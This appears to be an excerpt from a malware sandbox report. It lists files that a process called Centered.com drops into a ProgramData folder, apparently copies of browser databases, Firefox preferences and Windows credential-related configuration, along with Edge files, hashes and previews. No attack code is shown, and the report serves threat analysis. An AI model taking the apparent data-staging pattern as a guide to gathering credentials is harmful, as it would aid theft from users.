                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\TJWTR1

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):10219
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.966520026409024
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:NPgBOOzJMk67cY82SGrPVYRjDjXK2F6KJzLLwGXtXqWgrjj31jj6OzJMk67cY82s:UYwP62I+Wr3JjkwP62I+Ws
                                                                                                                                                                                                                                                                                      MD5:381138FA1B1C4C298AD2441898677ED6
                                                                                                                                                                                                                                                                                      SHA1:B8A0B0ECAAF6F3BBD7C27DD54ACD4BC3366DD0A4
                                                                                                                                                                                                                                                                                      SHA-256:D4EE07BC2183E3D013B68B080B9E2F603676B27F8B0C95CCA2ED533BC671FAFA
                                                                                                                                                                                                                                                                                      SHA-512:095C2B1C129C36125FE17ED096FDE58AE0F8AF61527D9AEDCAB379C3221BF09D87F28846E6FA3CF9FE05C750689A2ADFCDD1AB67409780A12A425A33219858EC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly>.. <assemblyIdentity.. buildType="release".. language="neutral".. name="Microsoft-Windows-Authentication-AuthUI-Component".. processorArchitecture="*".. publicKeyToken="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. optimizePatterns="no".. offlineApply="no".. replacementSettingsVersionRange="0".. replacementVersionRange="6.2-10.0".. scope="MigWiz,Upgrade".. settingsVersion="0".. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. Downlevel settings -->.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultUserName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon [DefaultDomainName]</pattern>.. <pattern type="Registry">HKLM\Software\Microsof

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\WLN79Z

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2829
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.130068712095974
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:/2e8G+F0Vg8DIIgPdunPduPPduNJ7IgfCfikfidjikjirJu/MY4C5uXC5u/C5upL:/29F+cO0Mf7Rwiai5ieiFEMAQSQaQwX4
                                                                                                                                                                                                                                                                                      MD5:CD55A48FE382A6820EC4FB55A66C2858
                                                                                                                                                                                                                                                                                      SHA1:70A0A7B0E12DF915BD5E68FF0432637EFC2153DE
                                                                                                                                                                                                                                                                                      SHA-256:97838AB994B53DFADEEF63955EECB05A7F118C2066EF97B0B0EB7BB48A526451
                                                                                                                                                                                                                                                                                      SHA-512:37C6D78CCD807B04834659B5E796424C443B2C4F72481CB4080ED1BC5E6A954E47C4AF837A653DDAAFED2372C4FF60CE442170EA58586AB93C57B841449C5195
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. name="Microsoft-Windows-Crypto-keys".. version="0.0.0.0".. processorArchitecture="*".. language="neutral".. />.. <migration scope="Upgrade,MigWiz,USMT" .. replacementVersionRange="6.0-6.1".. replacementSettingsVersionRange="0".. settingsVersion="0" .. >.. <migXml xmlns="">.. <rules context="User">.. <include>.. <objectSet>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\RSA\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\DSS\*[*]</pattern>.. <pattern type="File">%CSIDL_APPDATA%\Microsoft\Crypto\Keys[*]</pattern>.. </objectSet>.. </include>.. </rules>..

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\XBS2D2

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\XTRIWB

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\Z58QQQ

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1769), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9370
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.514140640374404
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
                                                                                                                                                                                                                                                                                      MD5:7E44458E0A8A3A7D10875BC3B7AE72D1
                                                                                                                                                                                                                                                                                      SHA1:E5E6AC8676EE3761DAB13A10EB7573C19F48D297
                                                                                                                                                                                                                                                                                      SHA-256:21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
                                                                                                                                                                                                                                                                                      SHA-512:012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2b1f33ba-2c06-4dfb-9e8a-52c28c9bdf19.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57647
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.103640521999742
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7ynfPGWv/sxtw7j7VLyMV/YoskFoz:z/0+zI7ynfv/4K7VeZoskG
                                                                                                                                                                                                                                                                                      MD5:6E22A71CA72B8C8CB8BB0B0D8447AC13
                                                                                                                                                                                                                                                                                      SHA1:BBE6B42286958326BCA378C0EB160D62FEA3EE33
                                                                                                                                                                                                                                                                                      SHA-256:C172B822668C30105CA48805482C5395646FD9392FA56BFA7377A0D959A20A5F
                                                                                                                                                                                                                                                                                      SHA-512:20158E69D0A1FD99E3B04798E1D2DA2313517157113478136DC5EFCF18AC9CFDF06CC33C82EAF990FE476076B2E18ACAC2669D87C6D991A4E44A66B720E62BFB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7d100659-df07-4d34-a3d7-e4c9e263fc0b.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):58695
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.100681192478866
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:xMk1rT8H1aPgPGWv/sxtwjzbDXlaR5FoS7VLyMV/Yost:xMYrT8VgEv/4KVUzVeZost
                                                                                                                                                                                                                                                                                      MD5:EBA91D4C9DA8897F7027DC956BBB937E
                                                                                                                                                                                                                                                                                      SHA1:F726D1BC150ED6DD83C41D8140839B2BD99C3B2A
                                                                                                                                                                                                                                                                                      SHA-256:1E42F7F19A2085FFF8A7D9174EC75032E595D2C27EE0556DC4AEF69EFF62967F
                                                                                                                                                                                                                                                                                      SHA-512:8307ED4203B4298D22F11A0633C1DDA2547141E6C822BC6B972DB4F63DB73510FF4B21C0A37C736E1397927A5EDC678BDAFB6E995AC63DAC7C6314183454E42D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"207f8458-9b43-4ef3-844e-298c2ec776ca"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735286727"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7fb0f573-6f18-4279-9fbf-2474e889386a.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):57725
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.104135850895125
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:z/Ps+wsI7yO1PGWv/sxtwjj7VLyMV/YoskFoz:z/0+zI7yOFv/4KjVeZoskG
                                                                                                                                                                                                                                                                                      MD5:294FA6015BF555F3644B030E2A6DFC62
                                                                                                                                                                                                                                                                                      SHA1:D45F7F7AD67B309FBFF46CB6843AC0FD9FA94F45
                                                                                                                                                                                                                                                                                      SHA-256:36E7EADC30CFB9D83D5B4B9CA2A356F9F418393B0478472D74349B09FFBD0BC8
                                                                                                                                                                                                                                                                                      SHA-512:2C96185E6B1C3476801C6BB88D3A3503D2FAD9CA18BFC10F7B9F16AA4AE079A49FAC837617D74AD0FCC6A375638F875BCA8B3DB23149D67E64E28E122D9FE5B9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\995a8f35-17bc-4c7e-aa54-c9f3d60c1759.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                      MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                      SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                      SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                      SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.640159940159965
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                                                                                                                      MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                                                                                                                      SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                                                                                                                      SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                                                                                                                      SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E5FC1-1184.pma

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.04759696309449672
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:dTf0m5tmRnOAUZY4J/7qiRDs0JVFg8X+9IVhkHsBzhEhNG0v+RQ8TfQpRqn8y08s:Nf0UtOaF6CHhcRmvQ3q08T2RGOD
                                                                                                                                                                                                                                                                                      MD5:678009617A516AE0F4A694EC381BAC47
                                                                                                                                                                                                                                                                                      SHA1:5A7059A1821508DF31EE9E05744233ECB4C3566F
                                                                                                                                                                                                                                                                                      SHA-256:1A39281734E190055EFA7AD41A71504237652030BD05B7E8049631F26A3CA4CA
                                                                                                                                                                                                                                                                                      SHA-512:212A796F2872880B1452324C13F47333FB0E91C37AA10F2283A251DB556D2E117E118CD7E1E209B529C6B427FD2602B04B879B28AE2D7E6FD40774361B827503
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".sabccg20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2......._.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E5FC1-7EC.pma

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):4194304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.43744441936569384
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:xD1t3QoIg0WNBNrhvB9FkcCIsKOsKWG7Yww/3dpwwyTqqzsAg1HFD:vt3OkFvBzkcC81cxwFpwwyTqqzsAaH1
                                                                                                                                                                                                                                                                                      MD5:89E2C66DA10BB86E809A35C4C0D049C3
                                                                                                                                                                                                                                                                                      SHA1:32B4A34B5746FA1783211715F6CD1E33C79E7C4A
                                                                                                                                                                                                                                                                                      SHA-256:B0B727A54D809AA33AB3D03D71856572247E0DE2C3E649B7E9AD1CFE0093E1B8
                                                                                                                                                                                                                                                                                      SHA-512:87239E5F390F973103CC948AA43C40836CAF9942EFE24E738DE197741364CF8B0775C59DB51579EEEF90D623AD29B071F44E5EFBA946D8221BD59D4B1C9C72C1
                                                                                                                                                                                                                                                                                      Malicious:false
